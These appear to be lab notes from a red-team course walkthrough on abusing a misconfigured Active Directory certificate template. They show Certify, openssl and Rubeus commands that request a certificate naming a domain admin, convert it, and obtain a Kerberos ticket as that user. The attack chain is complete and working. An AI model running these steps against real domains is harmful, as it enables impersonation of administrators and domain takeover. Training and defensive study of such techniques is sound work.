Misconfigured Certificate Templates

Certify.exe find /vulnerable

Let's go through the key parts of this output.

This template is served by sub-ca.
The template is called CustomUser.
ENROLLEE_SUPPLIES_SUBJECT is enabled, which allows the certificate requestor to provide any SAN (subject alternative name).
The certificate usage has Client Authentication set.
DEV\Domain Users have enrollment rights, so any domain user may request a certificate from this template.

If a principal you control has WriteOwner, WriteDacl or WriteProperty, then this could also be abused.

This configuration allows any domain user to request a certificate for any other domain user (including a domain admin) and use it for authentication.

Request a certificate for nlamb

Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb

Copy the whole certificate (both the private key and certificate) and save it to cert.pem on Ubuntu WSL.

Use the provided openssl command to convert it to pfx format

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

pass123

Convert cert.pfx into a base64 encoded string

cat cert.pfx | base64 -w 0

Use asktgt to request a TGT for the user using the certificate

Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap

Last updated 2 years ago